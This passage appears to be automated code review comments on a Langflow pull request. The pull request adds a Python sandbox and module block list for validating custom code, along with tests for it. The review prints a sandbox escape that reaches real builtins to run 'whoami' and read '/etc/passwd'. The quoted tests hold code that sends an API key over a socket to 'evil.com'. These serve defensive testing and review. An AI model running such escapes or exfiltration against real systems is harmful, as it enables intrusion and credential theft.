    isolated_builtins["builtins"] = IsolatedBuiltinsModule()

    return isolated_builtins


def create_isolated_import():
    """Create an import function that blocks dangerous modules by default.

    By default, blocks dangerous modules (os, subprocess, socket, etc.).
    Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow them.

    Returns:
        A function that performs isolated imports
    """
    def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0):  # noqa: A002, ARG001
        """Import function that blocks dangerous modules by default."""
        # Extract top-level module name
        module_name = name.split(".")[0]

        # Block dangerous modules unless explicitly allowed
        if not ALLOW_DANGEROUS_CODE:
            if module_name in BLOCKED_MODULES:
                raise SecurityViolation(
                    f"Dangerous module '{module_name}' is blocked. "
                    f"Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow."
                )
        # Allow langflow.* and lfx.* modules, and any module not in BLOCKED_MODULES
        # This allows users to import legitimate third-party libraries (AI libraries, etc.)
        # while still blocking dangerous system-level operations
        is_lfx_module = module_name == "lfx" or module_name.startswith("lfx.")
        is_langflow_module = module_name == "langflow" or module_name.startswith("langflow.")

        # If it's not a blocked module, and not langflow/lfx, it's allowed
        # (We've already checked BLOCKED_MODULES above, so anything reaching here is safe)

        # Import the module (still isolated namespace-wise)
        return importlib.import_module(name)

    return isolated_import

⚠️ Potential issue | 🔴 Critical

Critical sandbox escape via import builtins (real builtins and __import__ are reachable).

Inside the sandbox, user code can currently do:

import builtins as real_builtins
real_builtins.__import__("os").system("whoami")
real_builtins.open("/etc/passwd").read()

Reason: create_isolated_import always delegates to importlib.import_module(name) and has no special handling for the "builtins" module. So import builtins returns the real builtins module, not the IsolatedBuiltinsModule you build in create_isolated_builtins. From there, all dangerous builtins and the real __import__ are available, bypassing both BLOCKED_BUILTINS and BLOCKED_MODULES.

This breaks the core sandbox guarantee and should be fixed before relying on this in production.

A minimal fix is to thread the isolated builtins into create_isolated_import and special‑case "builtins" so imports always see the fake module:

-import builtins
-import importlib
-import os
-from typing import Any, Dict, Set
+import builtins
+import importlib
+import os
+from typing import Any
@@
-def create_isolated_builtins() -> Dict[str, Any]:
+def create_isolated_builtins() -> dict[str, Any]:
@@
-    class IsolatedBuiltinsModule:
+    class IsolatedBuiltinsModule:
         """Fake builtins module that prevents escaping."""
@@
-    isolated_builtins["builtins"] = IsolatedBuiltinsModule()
+    isolated_builtins["builtins"] = IsolatedBuiltinsModule()
@@
-def create_isolated_import():
+def create_isolated_import(isolated_builtins: dict[str, Any]):
@@
-    def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0):  # noqa: A002, ARG001
+    def isolated_import(name: str, globals=None, locals=None, fromlist=(), level=0):  # noqa: A002, ARG001
@@
-        module_name = name.split(".")[0]
-        
+        module_name = name.split(".")[0]
+
+        # Never expose the real `builtins` module into the sandbox.
+        # Always return the isolated fake module created in `create_isolated_builtins`.
+        if module_name == "builtins":
+            return isolated_builtins["builtins"]
+
@@
-    return isolated_import
+    return isolated_import
@@
-    # Create isolated builtins - prevents accessing real __builtins__
-    isolated_builtins = create_isolated_builtins()
-
-    # Create isolated import function
-    isolated_import = create_isolated_import()
+    # Create isolated builtins - prevents accessing real __builtins__
+    isolated_builtins = create_isolated_builtins()
+
+    # Create isolated import function; it needs access to `isolated_builtins`
+    # so that `import builtins` returns the fake module, not the real one.
+    isolated_import = create_isolated_import(isolated_builtins)

This ensures import builtins inside the sandbox always returns the restricted IsolatedBuiltinsModule, so attempts to reach open, __import__, etc., will hit your SecurityViolation checks instead of the real interpreter module.
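A regression test along these lines could lock the behavior in (sketch; assumes the fix above is applied and that SecurityViolation propagates out of execute_in_sandbox):

import pytest

from lfx.custom.sandbox import SecurityViolation, execute_in_sandbox


def test_import_builtins_cannot_reach_real_open():
    escape_code = """
import builtins as real_builtins
leaked = real_builtins.open("/etc/passwd").read()
"""
    code_obj = compile(escape_code, "<test>", "exec")
    with pytest.raises(SecurityViolation):
        execute_in_sandbox(code_obj, {})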

Comment on lines +11 to 12
from lfx.custom.sandbox import create_isolated_import, execute_in_sandbox
from lfx.field_typing.constants import CUSTOM_COMPONENT_SUPPORTED_TYPES, DEFAULT_IMPORT_STRING

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Sandboxed import handling changes error surface for “dangerous” modules

validate_code now uses create_isolated_import() for both ast.Import and ast.ImportFrom and treats any Exception (including security violations from blocked modules) as an import error. That means code importing e.g. os/subprocess will start producing additional entries in result["imports"]["errors"], whereas previously only truly missing modules would. This is probably desirable for the validate endpoint, but it diverges from tests like test_code_with_multiple_imports which currently expect exactly two errors for nonexistent1/nonexistent2. Please double‑check the existing tests and any API consumers that depend on the old “only ModuleNotFoundError counts” behavior and update them or narrow the exception handling (e.g., distinguish SecurityViolation vs ModuleNotFoundError) as needed.

Also applies to: 51-73


I'll verify the review comment by examining the actual code and tests to understand if the sandboxing change breaks existing behavior.


🏁 Script executed:

#!/bin/bash
# Find and examine the validate.py file to understand the new import and its usage

find . -name "validate.py" -type f | grep -E "lfx|custom" | head -5

Length of output: 83


🏁 Script executed:

#!/bin/bash
# Find and examine the sandbox.py file to understand exception types

find . -name "sandbox.py" -type f | head -5

Length of output: 35


🏁 Script executed:

#!/bin/bash
# Find the test file mentioned in the review

find . -name "test_validate.py" -type f | head -5

Length of output: 151


🏁 Script executed:

#!/bin/bash
# Examine the validate.py file under review (lines 1-80 for context)
cat ./src/lfx/src/lfx/custom/validate.py | head -80

Length of output: 2960


🏁 Script executed:

#!/bin/bash
# Examine sandbox.py to understand exception types and create_isolated_import behavior
cat ./src/lfx/src/lfx/custom/sandbox.py

Length of output: 8868


🏁 Script executed:

#!/bin/bash
# Search for test_code_with_multiple_imports in test files
rg -n "test_code_with_multiple_imports" ./src/backend/tests/unit/utils/ ./src/lfx/tests/

Length of output: 98


🏁 Script executed:

#!/bin/bash
# Examine the test file to see test_code_with_multiple_imports expectations
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '123,160p'

Length of output: 1431


🏁 Script executed:

#!/bin/bash
# Get more context around that test, including imports and setup
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '1,50p'

Length of output: 1298


🏁 Script executed:

#!/bin/bash
# Search for other tests that check import errors count
rg -n "imports.*errors" ./src/backend/tests/unit/utils/test_validate.py -A 2 -B 2

Length of output: 1276


🏁 Script executed:

#!/bin/bash
# Check the other tests that expect empty imports errors or specific counts
cat ./src/backend/tests/unit/utils/test_validate.py | sed -n '55,92p'

Length of output: 1192


🏁 Script executed:

#!/bin/bash
# Check if there's any setup/teardown that sets the environment variable
rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE" ./src/backend/tests/unit/utils/test_validate.py

Length of output: 0


🏁 Script executed:

#!/bin/bash
# Check if this test file has any class setup or pytest fixtures
grep -n "setUp\|@pytest.fixture\|@classmethod" ./src/backend/tests/unit/utils/test_validate.py | head -20

Length of output: 0


🏁 Script executed:

#!/bin/bash
# Verify the exact lines in validate.py where exception handling occurs (51-73)
cat ./src/lfx/src/lfx/custom/validate.py | sed -n '51,75p'

Length of output: 1298


🏁 Script executed:

#!/bin/bash
# Double-check that os and sys are indeed in BLOCKED_MODULES
grep -n "\"os\"\|\"sys\"" ./src/lfx/src/lfx/custom/sandbox.py

Length of output: 26


Update test expectations for new sandbox behavior in test_code_with_multiple_imports

The sandboxing change correctly surfaces blocked modules (e.g., os, sys) as import errors via SecurityViolation, which is caught by the generic except Exception handler. However, test_code_with_multiple_imports imports both os and sys (both in BLOCKED_MODULES) and expects exactly 2 errors for nonexistent modules only. After this change, the test will receive 4 errors: os, sys, nonexistent1, and nonexistent2, causing the assertion assert len(result["imports"]["errors"]) == 2 to fail.

Suggested fixes:

  1. Update the test to either:
    • Remove os and sys from the test code if only testing nonexistent modules
    • Update the assertion to expect 4 errors if the intent is testing mixed scenarios
  2. Or, distinguish between SecurityViolation and ModuleNotFoundError in validate.py if dangerous modules should not be counted as validation errors (though blocking them at import time is better for security)

Test file: ./src/backend/tests/unit/utils/test_validate.py (lines 123-138)
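A sketch of the second option, classifying blocked modules separately (names from this review; not the actual validate.py loop):

from lfx.custom.sandbox import SecurityViolation, create_isolated_import

isolated_import = create_isolated_import()
errors, blocked = [], []
for module_name in ("os", "sys", "nonexistent1", "nonexistent2"):
    try:
        isolated_import(module_name)
    except SecurityViolation as exc:
        blocked.append(str(exc))  # could be reported under imports["blocked"]
    except Exception as exc:  # ModuleNotFoundError and similar
        errors.append(str(exc))  # preserves the old "2 errors" expectation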

🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/validate.py around lines 11-12, the sandbox now raises
SecurityViolation for blocked modules (e.g., os, sys) which are being caught by
the generic exception handler and counted as import errors, causing tests that
expect only ModuleNotFoundError counts to fail; to fix, either update the unit
test ./src/backend/tests/unit/utils/test_validate.py (lines 123-138) to remove
os/sys from the test input or change the assertion to expect 4 errors, or modify
validate.py to catch SecurityViolation separately and either skip adding it to
imports["errors"] or classify it under a distinct imports["blocked"] key
(implement by adding an except SecurityViolation: branch that handles/filters
those exceptions before the generic except Exception).

Comment on lines 11 to 218

def test_sandbox_cannot_access_parent_globals():
    """Test that sandboxed code cannot access parent function's globals."""
    # Set a variable in the parent scope
    parent_var = "should_not_be_accessible"

    code = """
def test():
    # Try to access parent_var from parent scope
    # If isolation were broken, this would work
    return parent_var
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    # Execute in sandbox
    execute_in_sandbox(code_obj, exec_globals)

    # Try to call the function
    test_func = exec_globals["test"]

    # Should raise NameError because parent_var is not accessible
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_modify_parent_globals():
    """Test that sandboxed code cannot modify parent scope's globals."""
    parent_dict = {"value": "original"}

    code = """
def test():
    # Try to modify parent_dict
    # If isolation were broken, this would modify the real parent_dict
    parent_dict["value"] = "modified"
    return parent_dict["value"]
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function - should fail because parent_dict is not accessible
    test_func = exec_globals["test"]

    with pytest.raises(NameError):
        test_func()

    # Verify parent_dict was not modified
    assert parent_dict["value"] == "original"


def test_sandbox_isolated_builtins():
    """Test that sandbox uses isolated builtins, not real ones."""
    # Create a marker in real builtins (simulating server state)
    import builtins
    original_builtins_len = len(dir(builtins))

    code = """
def test():
    import builtins
    # Try to access real builtins
    # If isolation were broken, we could modify real builtins
    builtins.ESCAPE_TEST = "should_not_exist"
    return hasattr(builtins, 'ESCAPE_TEST')
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]
    result = test_func()

    # Should return False or True but not affect real builtins
    # Verify real builtins wasn't modified
    assert not hasattr(builtins, "ESCAPE_TEST")
    assert len(dir(builtins)) == original_builtins_len


def test_sandbox_fresh_namespace_per_execution():
    """Test that each execution gets a fresh isolated namespace."""
    code1 = """
GLOBAL_VAR = "first_execution"
def test():
    return GLOBAL_VAR
"""
    code_obj1 = compile(code1, "<test>", "exec")
    exec_globals1 = {}
    execute_in_sandbox(code_obj1, exec_globals1)

    # Second execution with different code
    code2 = """
def test():
    # Try to access GLOBAL_VAR from previous execution
    # If isolation were broken, this would work
    return GLOBAL_VAR
"""
    code_obj2 = compile(code2, "<test>", "exec")
    exec_globals2 = {}
    execute_in_sandbox(code_obj2, exec_globals2)

    # Should raise NameError because GLOBAL_VAR doesn't exist in this execution
    test_func = exec_globals2["test"]
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_access_frame_locals():
    """Test that sandboxed code cannot access caller's local variables."""
    def caller_function():
        local_var = "should_not_be_accessible"

        code = """
def test():
    # Try to access local_var from caller
    # If isolation were broken, this would work
    return local_var
"""
        code_obj = compile(code, "<test>", "exec")
        exec_globals = {}

        execute_in_sandbox(code_obj, exec_globals)

        # Call the function
        test_func = exec_globals["test"]

        # Should raise NameError because local_var is not accessible
        with pytest.raises(NameError):
            test_func()

    caller_function()


def test_sandbox_isolated_imports():
    """Test that imports in sandbox are isolated from parent scope."""
    # Set up a mock module in parent scope (simulating server state)
    import sys
    original_modules = set(sys.modules.keys())

    code = """
import json
def test():
    # Import json - should be isolated
    return json.__name__
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]
    result = test_func()

    # Should work but json import should be isolated
    assert result == "json"

    # Verify we didn't accidentally modify sys.modules in a way that persists
    # (though importlib.import_module does modify sys.modules, the key is that
    # the sandbox's view of modules is isolated)
    current_modules = set(sys.modules.keys())
    # New modules might be added, but that's expected for imports


def test_sandbox_function_definition_time_isolation():
    """Test that function definition time code (default args) executes in isolation."""
    parent_var = "should_not_be_accessible"

    code = """
def test(x=parent_var):
    # Default argument evaluation happens at definition time
    # If isolation were broken, parent_var would be accessible
    return x
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    # Execute in sandbox - definition time code runs here
    execute_in_sandbox(code_obj, exec_globals)

    # Try to call the function
    test_func = exec_globals["test"]

    # Should raise NameError when function is defined (default arg evaluation)
    # OR when called without args
    # The key is that parent_var is not accessible during definition
    with pytest.raises(NameError):
        test_func()  # Calling without args triggers default arg evaluation


def test_sandbox_decorator_isolation():
    """Test that decorator evaluation happens in isolation."""
    parent_var = "should_not_be_accessible"

    code = """
@(parent_var or lambda f: f)
def test():
    return 1
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    # Execute in sandbox - decorator evaluation happens here
    # Should raise NameError because parent_var is not accessible
    with pytest.raises(NameError):
        execute_in_sandbox(code_obj, exec_globals)


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Tests assume exec_globals is populated by execute_in_sandbox, but the implementation does not do that

All of these tests follow the pattern:

exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]
test_func()

However, execute_in_sandbox currently creates an internal sandbox_globals dict, updates it with exec_globals, and executes the code there without writing any new names (like test) back into exec_globals. As written, exec_globals["test"] will raise KeyError, so the assertions about NameError and isolation never actually run.

To make these tests exercise the real contract of execute_in_sandbox, you probably want one of:

  • Change execute_in_sandbox to treat exec_globals as the sandbox globals (and let exec populate it), or to return the sandbox namespace so tests can pull out test from the returned dict, or
  • Restructure tests to assert on exceptions raised directly from execute_in_sandbox (e.g., have the code string call test() at module top level so a NameError occurs during exec), instead of trying to retrieve and call the function afterwards.

Also, test_sandbox_isolated_builtins assumes that mutating builtins inside the sandbox cannot affect the process‑wide builtins module. Given create_isolated_import currently delegates to importlib.import_module, you may still be importing the real builtins module inside the sandbox; verify this expectation against the actual sandbox implementation.



---

🏁 Script executed:

#!/bin/bash
# Find sandbox-related files and the execute_in_sandbox function
fd -t f "sandbox" --type python | head -20

Length of output: 173


🏁 Script executed:

#!/bin/bash
# Search for execute_in_sandbox definition
rg -n "def execute_in_sandbox" --type python

Length of output: 30


🏁 Script executed:

#!/bin/bash
# Search for create_isolated_import and create_isolated_builtins
rg -n "def create_isolated_(import|builtins)" --type python

Length of output: 30


🏁 Script executed:

#!/bin/bash
# Verify the test file exists and show first few test patterns
cat src/lfx/tests/unit/custom/test_sandbox_isolation.py | head -60

Length of output: 1759



---

🏁 Script executed:

#!/bin/bash
# Find sandbox.py or related sandbox implementation
fd sandbox -e py

Length of output: 136


🏁 Script executed:

#!/bin/bash
# Search for execute_in_sandbox definition with correct syntax
rg -n "def execute_in_sandbox" -g "*.py"

Length of output: 114


🏁 Script executed:

#!/bin/bash
# Search for sandbox-related imports and implementations
rg -n "execute_in_sandbox|create_isolated" -g "*.py" -A 5

Length of output: 13244


🏁 Script executed:

#!/bin/bash
# Look for the custom module structure
find . -type d -name custom | head -10

Length of output: 119



---

🏁 Script executed:

#!/bin/bash
# Get full execute_in_sandbox implementation
sed -n '176,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2592


🏁 Script executed:

#!/bin/bash
# Get create_isolated_builtins implementation
sed -n '88,139p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2274


🏁 Script executed:

#!/bin/bash
# Get create_isolated_import implementation
sed -n '140,175p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 1712


🏁 Script executed:

#!/bin/bash
# Check the full sandbox.py to see how sandbox_globals is used
wc -l src/lfx/src/lfx/custom/sandbox.py

Length of output: 37


Tests assume exec_globals is populated after execute_in_sandbox() returns, but the implementation does not do this

The core issue: execute_in_sandbox creates an internal sandbox_globals dict, merges exec_globals into it (line 218), executes code in that dict, and returns None without writing anything back to exec_globals. All tests then try to access exec_globals["test"], which will raise KeyError before any isolation assertions run.

Every test in this module follows the failing pattern:

exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]  # KeyError - exec_globals was never modified

To fix this, either:

  • Modify execute_in_sandbox to return the sandbox namespace (or write it back to exec_globals), or
  • Restructure tests to assert on exceptions during execute_in_sandbox itself (e.g., have code call the test function at module level so NameError occurs during exec)

Additionally, create_isolated_import uses importlib.import_module(), which returns the real builtins module, not the IsolatedBuiltinsModule wrapper. This means code that does import builtins gets the actual module, and mutations inside the sandbox could affect the process-wide builtins. Verify whether this matches your isolation intent.
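A sketch of the first option (write-back), using the internal names described above; _build_sandbox_globals is a hypothetical stand-in for the existing setup code:

def execute_in_sandbox(code_obj, exec_globals):
    sandbox_globals = _build_sandbox_globals()  # hypothetical: isolated builtins + __import__
    sandbox_globals.update(exec_globals)
    exec(code_obj, sandbox_globals)  # noqa: S102 - sandboxed on purpose
    # Write the resulting namespace back so callers (and these tests) can pull
    # defined names like `test` out of exec_globals afterwards.
    exec_globals.clear()
    exec_globals.update(sandbox_globals)
    return exec_globals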

🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_isolation.py around lines 11-218,
tests assume execute_in_sandbox populates the passed exec_globals with the
executed namespace but the current implementation builds an internal
sandbox_globals, executes into it and returns None (line ~218), leaving
exec_globals empty and causing KeyError; fix by changing execute_in_sandbox to
either write the final sandbox namespace back into the provided exec_globals
dict (e.g., clear exec_globals and update it with sandbox_globals) or return the
sandbox namespace and update callers/tests accordingly so exec_globals["test"]
exists after execution; also address create_isolated_import returning real
modules (not wrappers) by ensuring the sandboxed import mechanism injects
isolated module objects (or a wrapped builtins module) into the sandbox's
sys.modules/builtins mapping during exec so an in-sandbox "import builtins"
yields the isolated builtins rather than the process-wide one.

Comment on lines 23 to 256
def test_sandbox_cannot_access_server_python_secrets():
    """CRITICAL: Test that sandboxed code cannot access server's Python variables/secrets.
    This is the KEY security property - code cannot access server secrets stored in memory.
    Even if code can do file I/O or network requests, it can't access server secrets to exfiltrate.
    """
    # Simulate server secrets stored in Python variables
    server_api_key = "sk-secret-key-12345"
    server_db_password = "db_password_secret"
    server_config = {
        "api_key": server_api_key,
        "database_url": "postgresql://user:password@localhost/db"
    }

    code = """
def test():
    # Try to access server's Python variables containing secrets
    # If isolation is broken, these would be accessible
    return server_api_key, server_db_password, server_config
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server secrets are not accessible
    # This is what prevents credential theft
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_access_server_credentials_via_python():
    """Test that code cannot access server credentials stored in Python variables.
    Even if code can do file I/O or network requests, it can't access server secrets
    stored in Python variables to exfiltrate them.
    """
    # Simulate server storing credentials in Python variables
    class ServerConfig:
        def __init__(self):
            self.api_key = "sk-secret-12345"
            self.database_url = "postgresql://user:pass@localhost/db"
            self.secret_token = "token_secret_xyz"

    server_config = ServerConfig()

    code = """
def test():
    # Try to access server's credential objects
    # If isolation is broken, we could access server_config.api_key
    return server_config.api_key
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server_config is not accessible
    # This prevents credential theft even if code can do file I/O or network requests
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_access_server_python_state():
    """Test that code cannot access server's Python state, even if it can access system resources.
    This is the key security property: namespace isolation prevents access to server secrets
    stored in Python variables, even though code can access system resources like os.environ.
    """
    # Server stores secrets in Python variables (not just env vars)
    server_secrets = {
        "api_key": "sk-secret-from-python-var",
        "db_password": "password-from-python-var"
    }

    code = """
import os
def test():
    # Code CAN access os.environ (system resource)
    env_key = os.environ.get('TEST_ENV_VAR', 'not_found')
    # But code CANNOT access server's Python variables
    # If isolation is broken, server_secrets would be accessible
    python_secret = server_secrets['api_key']
    return env_key, python_secret
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    # Set env var to test that system resources ARE accessible
    os.environ["TEST_ENV_VAR"] = "env_value"

    try:
        execute_in_sandbox(code_obj, exec_globals)

        # Call the function
        test_func = exec_globals["test"]

        # Should raise NameError - server_secrets Python variable is not accessible
        # This proves namespace isolation works, even though os.environ is accessible
        with pytest.raises(NameError):
            test_func()
    finally:
        if "TEST_ENV_VAR" in os.environ:
            del os.environ["TEST_ENV_VAR"]


def test_sandbox_cannot_exfiltrate_secrets_via_commands():
    """Test that code cannot access server secrets to pass to system commands.
    Code CAN execute system commands, but it CANNOT access server secrets
    stored in Python variables to pass to those commands.
    """
    # Server secret stored in Python variable
    server_secret = "secret_password_12345"

    code = """
import subprocess
def test():
    # Code CAN execute commands
    # But code CANNOT access server_secret to pass to command
    # If isolation is broken, we could do: subprocess.run(['echo', server_secret])
    result = subprocess.check_output(['echo', server_secret], text=True)
    return result.strip()
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server_secret is not accessible
    # This prevents code from exfiltrating secrets via system commands
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_access_server_python_variables():
    """Test that sandboxed code cannot access server's Python variables/state.
    This is what namespace isolation actually prevents.
    """
    # Set a variable in the "server" scope
    server_secret = "server_secret_value"
    server_config = {"api_key": "secret_key_123"}

    code = """
def test():
    # Try to access server's Python variables
    # If isolation is broken, these would be accessible
    return server_secret, server_config
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # Should raise NameError - server variables are not accessible
    with pytest.raises(NameError):
        test_func()


def test_sandbox_cannot_modify_server_python_state():
    """Test that sandboxed code cannot modify server's Python state."""
    server_state = {"modified": False}

    code = """
def test():
    # Try to modify server state
    server_state["modified"] = True
    return server_state
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # Should raise NameError - server_state is not accessible
    with pytest.raises(NameError):
        test_func()

    # Verify server state was not modified
    assert server_state["modified"] is False


def test_sandbox_cannot_exfiltrate_secrets_via_network():
    """Test that code cannot access server secrets to send via network requests.
    Code CAN make network requests, but it CANNOT access server secrets
    stored in Python variables to send in those requests.
    """
    # Server secret stored in Python variable
    server_api_key = "sk-secret-key-to-exfiltrate"

    code = """
import socket
def test():
    # Code CAN make network requests
    # But code CANNOT access server_api_key to send
    # If isolation is broken, we could do: socket.send(server_api_key.encode())
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('evil.com', 1337))
    s.send(server_api_key.encode()) # Try to send server secret
    s.close()
    return 'sent'
"""
    code_obj = compile(code, "<test>", "exec")
    exec_globals = {}

    execute_in_sandbox(code_obj, exec_globals)

    # Call the function
    test_func = exec_globals["test"]

    # CRITICAL: Should raise NameError - server_api_key is not accessible
    # This prevents code from exfiltrating secrets via network requests
    with pytest.raises(NameError):
        test_func()


⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

Security tests don’t match the current sandbox contract and may be brittle

A few intertwined issues here:

  1. Namespace contract mismatch (same as isolation tests)
    Every test does:

    exec_globals = {}
    execute_in_sandbox(code_obj, exec_globals)
    test_func = exec_globals["test"]

    But execute_in_sandbox builds its own sandbox_globals dict and never writes back into exec_globals, so exec_globals["test"] will raise KeyError before any NameError about server_* variables can be observed. Either adjust execute_in_sandbox to expose the sandbox namespace (e.g., by mutating or returning it) or rewrite the tests to assert on exceptions raised directly from execute_in_sandbox.

  2. Assumptions about dangerous modules being usable
    Several tests assume os, subprocess, and socket imports succeed and that only access to server‑side Python variables is blocked. The sandbox implementation, however, is documented to block these modules by default unless LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION is enabled. Without that toggle set, these tests are likely to fail at import time with a security error rather than the intended NameError. Consider:

    • Explicitly setting/resetting the env flag in a fixture for these tests (see the fixture sketch after this comment), or
    • Splitting tests to cover both “dangerous allowed” and “dangerous blocked” modes, asserting on the correct exception type in each.
  3. Real subprocess/network usage in unit tests
    subprocess.check_output and socket.connect/send are being called for real. Even if the name‑resolution failure is ultimately what you want to assert, the code will still attempt to open processes and network connections first, which can make tests flaky or environment‑dependent. Stubbing these (e.g., monkeypatch or patch subprocess.check_output / socket.socket) would keep the tests focused purely on namespace isolation semantics.

Overall, the intent of these tests is good, but they need to be brought in line with how execute_in_sandbox and the “dangerous modules” toggle actually behave.
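A sketch of both ideas, assuming pytest's built-in monkeypatch fixture and the env var named in this PR (the exact wiring is an assumption):

```python
import pytest


@pytest.fixture
def allow_dangerous_code(monkeypatch):
    """Opt a test into the 'dangerous allowed' mode; monkeypatch undoes it at teardown."""
    monkeypatch.setenv("LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION", "true")


@pytest.fixture
def no_real_network(monkeypatch):
    """Keep exfiltration tests deterministic: never open a real socket."""

    class FakeSocket:
        def __init__(self, *args, **kwargs): ...
        def connect(self, address): ...
        def send(self, data): ...
        def close(self): ...

    monkeypatch.setattr("socket.socket", FakeSocket)
```

Note that if the sandbox reads the flag once at import time (as noted elsewhere in this review), the env-var fixture alone won't flip it; the module-level constant would also need to be patched or the module reloaded.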


I'll verify the review comment by examining the actual execute_in_sandbox implementation and related sandbox configuration.


---

🏁 Script executed:

```shell
#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type py -A 15
```

Length of output: 1394


🏁 Script executed:

#!/bin/bash
# Search for LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION usage
rg -n "LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION" --type py -C 2

Length of output: 3463


🏁 Script executed:

#!/bin/bash
# Find sandbox module and dangerous modules handling
rg -n "dangerous.*module|block.*import" --type py -i -C 3

Length of output: 15508


🏁 Script executed:

#!/bin/bash
# Check test file imports at the top of test_sandbox_security.py
head -n 30 src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 1281


🏁 Script executed:

#!/bin/bash
# Search for where globals dict is populated or returned in sandbox
rg -n "exec_globals|sandbox_globals" --type py -B 2 -A 5 | head -100

Length of output: 7723


I need to see the full implementation of execute_in_sandbox to verify whether it mutates exec_globals and when the dangerous module errors occur.


---

🏁 Script executed:

```shell
#!/bin/bash
# Get full execute_in_sandbox implementation
sed -n '176,210p' src/lfx/src/lfx/custom/sandbox.py
```

Length of output: 1518


🏁 Script executed:

#!/bin/bash
# Get the complete sandbox_globals creation and execution logic
sed -n '200,230p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 1156


🏁 Script executed:

#!/bin/bash
# Look for where globals dict is populated after exec
rg -n "sandbox_globals\|exec_globals" src/lfx/src/lfx/custom/sandbox.py -A 3 -B 1

Length of output: 0


🏁 Script executed:

#!/bin/bash
# Check if there are fixtures in test_sandbox_security.py that set the env var
grep -n "LANGFLOW_ALLOW_DANGEROUS_CODE\|monkeypatch\|setenv" src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 0


I need to see the end of the execute_in_sandbox function to understand if exec_globals is mutated with the sandbox results.


---

🏁 Script executed:

```shell
#!/bin/bash
# Get the complete execute_in_sandbox function from line 230 onward
sed -n '230,250p' src/lfx/src/lfx/custom/sandbox.py
```

Length of output: 424


🏁 Script executed:

#!/bin/bash
# Get the entire execute_in_sandbox function in one view
awk '/^def execute_in_sandbox/,/^def [a-z_]/ {print NR": "$0}' src/lfx/src/lfx/custom/sandbox.py | head -80

Length of output: 81


🏁 Script executed:

#!/bin/bash
# Count total lines in sandbox.py and get end of function
wc -l src/lfx/src/lfx/custom/sandbox.py

Length of output: 37


🏁 Script executed:

#!/bin/bash
# Get lines 230-260 to see exec call and what happens
sed -n '230,260p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 424


Security tests won't pass with current sandbox implementation and are brittle

The review comment accurately identifies three real issues:

  1. exec_globals dict is never populated (confirmed)
    execute_in_sandbox merges exec_globals into sandbox_globals at line 224, executes code in sandbox_globals, but never writes results back. Tests calling exec_globals["test"] will raise KeyError before assertions are reached.

  2. Dangerous modules fail at import time with SecurityViolation (confirmed)
    Tests assume import os, import subprocess, import socket succeed. However, when exec() runs the code at line 232, these imports trigger create_isolated_import(), which raises SecurityViolation (lines 155–160) because ALLOW_DANGEROUS_CODE defaults to false. The function re-raises this exception, so tests fail before reaching the intended NameError assertions. No fixtures set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true.

  3. Real subprocess/network I/O (would occur if imports succeeded)
    subprocess.check_output and socket.connect('evil.com', 1337) execute for real, making tests flaky and environment-dependent.

Recommendation: Either refactor execute_in_sandbox to populate exec_globals with the sandbox namespace results, or rewrite tests to assert on exceptions from execute_in_sandbox itself and use pytest fixtures to explicitly enable/disable dangerous modules for different test scenarios.
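For the default "dangerous blocked" mode, the assertion can target the sandbox call itself, roughly like this (import path taken from this PR; treat as a sketch):

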